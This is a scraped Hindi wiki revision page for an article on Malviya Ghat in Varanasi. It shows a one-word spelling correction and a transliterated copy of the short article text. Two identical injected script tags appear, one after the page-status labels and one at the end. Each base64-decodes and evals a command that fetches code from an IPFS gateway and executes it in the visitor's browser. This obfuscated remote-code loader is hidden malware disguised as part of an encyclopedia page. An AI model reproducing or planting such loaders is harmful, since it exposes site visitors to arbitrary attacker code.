Difference between revisions of "मालवीय घाट वाराणसी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पश्चात " to "पश्चात् ")
 
Line 1: Line 1:
'''मालवीय घाट''' [[वाराणसी]] में स्थित है। [[असी घाट वाराणसी|अस्सी घाट]] के दक्षिणी भाग का विस्तार करने के पश्चात घाट का पक्का निर्माण कराया गया। इस विस्तारित क्षेत्र को महामना [[मदन मोहन मालवीय]] जी के नाम पर मालवीय घाट से नामकरण किया गया। अस्सी घाट से सटे होने के कारण पर्यटकों एवं स्नानार्थियों का यहां भी आगमन होता है।
+
'''मालवीय घाट''' [[वाराणसी]] में स्थित है। [[असी घाट वाराणसी|अस्सी घाट]] के दक्षिणी भाग का विस्तार करने के पश्चात् घाट का पक्का निर्माण कराया गया। इस विस्तारित क्षेत्र को महामना [[मदन मोहन मालवीय]] जी के नाम पर मालवीय घाट से नामकरण किया गया। अस्सी घाट से सटे होने के कारण पर्यटकों एवं स्नानार्थियों का यहां भी आगमन होता है।
  
  

Latest revision as of 07:29, 7 November 2017

malaviy ghat varanasi mean sthit hai. assi ghat ke dakshini bhag ka vistar karane ke pashchath ghat ka pakka nirman karaya gaya. is vistarit kshetr ko mahamana madan mohan malaviy ji ke nam par malaviy ghat se namakaran kiya gaya. assi ghat se sate hone ke karan paryatakoan evan snanarthiyoan ka yahaan bhi agaman hota hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>